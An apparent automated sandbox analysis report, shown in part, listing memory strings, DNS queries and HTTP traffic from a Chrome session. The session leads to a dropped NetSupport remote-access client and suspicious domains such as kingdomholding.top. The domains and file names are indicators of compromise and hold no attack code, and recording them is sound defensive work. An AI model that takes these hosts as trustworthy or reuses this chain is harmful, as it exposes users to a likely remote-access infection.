Source: chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/cspreportframe equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX$ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3188767621.0000742400896000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2907199839.00007424011D8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR34"7 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlmin.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/player/3b4b7883/www-player.css equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/player/3b4b7883/www-player.csseHandleror equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3188767621.0000742400896000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2907199839.00007424011D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: tTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState\|\|d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2624436825.0000742402092000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2257928889.0000742402CE7000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1694261859.0000742402578000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2624436825.0000742402092000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2421538935.0000742401ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com0 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2418860091.00007424016CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com@x equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2907199839.00007424011D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: www.youtube.comtTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState\|\|d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: fountainofhealth.ca
Source: global traffic	DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic	DNS traffic detected: DNS query: 3dmaine.com
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: static.cloudflareinsights.com
Source: global traffic	DNS traffic detected: DNS query: i.ytimg.com
Source: global traffic	DNS traffic detected: DNS query: kingdomholding.top
Source: global traffic	DNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global traffic	DNS traffic detected: DNS query: static.doubleclick.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: yt3.ggpht.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: www.stlchicago.com
Source: global traffic	DNS traffic detected: DNS query: beacons.gcp.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: google.com
Source: global traffic	DNS traffic detected: DNS query: e2c12.gcp.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons2.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons3.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons4.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons5.gvt2.com
Source: global traffic	DNS traffic detected: DNS query: beacons5.gvt3.com

Source: unknown

HTTP traffic detected: POST /youtubei/v1/log_event?alt=json HTTP/1.1host: www.youtube.comcontent-length: 12121sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0x-youtube-client-name: 56x-youtube-ad-signals: dt=1748893175463&flash=0&frm=2&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&bc=31&bih=-12245933&biw=-12245933&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C850%2C480&vis=1&wgl=true&ca_type=imagex-goog-event-time: 1748893179530x-youtube-client-version: 1.20250528.22.00content-type: application/jsonx-youtube-page-label: youtube.player.web_20250528_22_RC00x-youtube-page-cl: 764512846x-youtube-utc-offset: -240x-youtube-device: cbr=Chrome&cbrver=134.0.0.0&ceng=WebKit&cengver=537.36&cos=Windows&cosver=10.0&cplatform=DESKTOPx-goog-visitor-id: CgtDX2FnWUQxOTVQQSj4-_fBBjIKCgJVUxIEGgAgOg%3D%3Dx-goog-request-time: 1748893179530user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36x-youtube-time-zone: America/New_Yorkaccept: */*origin: https://www.youtube.comx-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=VZrzuY-qz_ocookie: __

Source: PCICL32.DLL.31.dr	String found in binary or memory: http://127.0.0.1
Source: PCICL32.DLL.31.dr	String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: hw.dll.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: adtw.dll1.31.dr, adtw.dll0.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.00000000083AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1337084127.0000000008381000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: hw.dll.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: adtw.dll1.31.dr, adtw.dll0.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: client32.exe.31.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: client32.exe.31.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: client32.exe.31.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
Source: client32.exe.31.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: client32.exe.31.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: hw.dll.31.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: adtw.dll1.31.dr, adtw.dll0.31.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: hw.dll.31.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.00000000083AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1337084127.0000000008381000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: adtw.dll1.31.dr, adtw.dll0.31.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: adtw.dll0.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: hw.dll.31.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: hw.dll.31.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: hw.dll.31.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_pa
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookgnkcckhobagln
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/mfhmdacoffpmifoiba
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookg
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad6bqrogtrdeb2aualzvp3izob2a_3/hajigopbbj
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbog
Source: pnf1.dll1.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://epscd.catcert.net/crl/ec-acc.crl0.
Source: pnf1.dll1.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://epscd2.catcert.net/crl/ec-acc.crl0
Source: chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://fountainofhealth.ca/
Source: PCICL32.DLL.31.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: PCICL32.DLL.31.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856165285.0000742401CC3000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422598110.0000742401CCC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://jquery.org/license
Source: chrome.exe, 00000000.00000003.1694261859.0000742402578000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://jqueryui.com
Source: pnf1.dll1.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://ocsp.catcert.cat0
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.00000000083AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1337084127.0000000008381000.00000004.00000001.00020000.00000000.sdmp, pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: adtw.dll1.31.dr, hw.dll.31.dr, adtw.dll0.31.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: hw.dll.31.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: adtw.dll1.31.dr, adtw.dll0.31.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000014.00000000.1337084127.0000000008354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.0000000008374000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crl
Source: client32.exe.31.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: client32.exe.31.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: client32.exe.31.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: client32.exe.31.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: hw.dll.31.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: client32.exe.31.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: http://s2.symcb.com0
Source: explorer.exe, 00000014.00000000.1329943695.00000000071E0000.00000002.00000001.00040000.00000009.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000014.00000000.1345005602.000000000BFF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micros/H
Source: client32.exe.31.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: client32.exe.31.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: client32.exe.31.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: client32.exe.31.dr	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: hw.dll.31.dr	String found in binary or memory: http://support.steampowered.com
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: http://sv.symcd.com0&
Source: hw.dll.31.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: hw.dll.31.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: hw.dll.31.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: explorer.exe, 00000014.00000000.1345005602.000000000BE90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1587698138.000000000BEBD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: pnf1.dll1.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://www.catcert.cat/descarrega/acc.crt0#
Source: hw.dll.31.dr	String found in binary or memory: http://www.counter-strike.net/cheat.html
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_thir
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookgnkcckhob
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/mfhmdacoffpmif
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/ad6bqrogtrdeb2aualzvp3izob2a_3/hajigopbbjhghbfimg
Source: PCICL32.DLL.31.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: PCICL32.DLL.31.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: PCICL32.DLL.31.dr	String found in binary or memory: http://www.pci.co.uk/support
Source: PCICL32.DLL.31.dr	String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: explorer.exe, 00000014.00000003.1587698138.000000000BF28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2020018194.000000000BF28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000014.00000000.1343526292.000000000B9EF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppsf
Source: explorer.exe, 00000014.00000000.1343526292.000000000B990000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1922881890.000000000BD3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2103016733.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1589213992.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000014.00000000.1343526292.000000000B990000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS000.
Source: explorer.exe, 00000014.00000003.1922881890.000000000BD3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2103016733.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1589213992.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSosk.exe
Source: explorer.exe, 00000014.00000000.1343526292.000000000B990000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSsRN
Source: explorer.exe, 00000014.00000003.1922881890.000000000BD3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2103016733.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1589213992.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSte=Y_
Source: explorer.exe, 00000014.00000003.1920742592.0000000008207000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.00000000081DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?=
Source: explorer.exe, 00000014.00000003.2018621481.0000000006C49000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=BD3E37D8C4964A928E655AAA177D65C1&timeOut=5000&oc
Source: explorer.exe, 00000014.00000003.2018621481.0000000006C49000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000014.00000000.1337084127.0000000008313000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.0000000008350000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t2
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comb
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/WindyV2.svg
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://becausemomsays.com/she-wanted-to-keep-her-deceased-husbands-ring-so-she-selfishly-denied-her
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13g0vJ
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13g0vJ-dark
Source: explorer.exe, 00000014.00000003.1585593064.0000000006C95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1919124163.0000000006C95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2018621481.0000000006C95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gK0V
Source: explorer.exe, 00000014.00000003.1585593064.0000000006C95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1919124163.0000000006C95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2018621481.0000000006C95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gK0V-dark
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
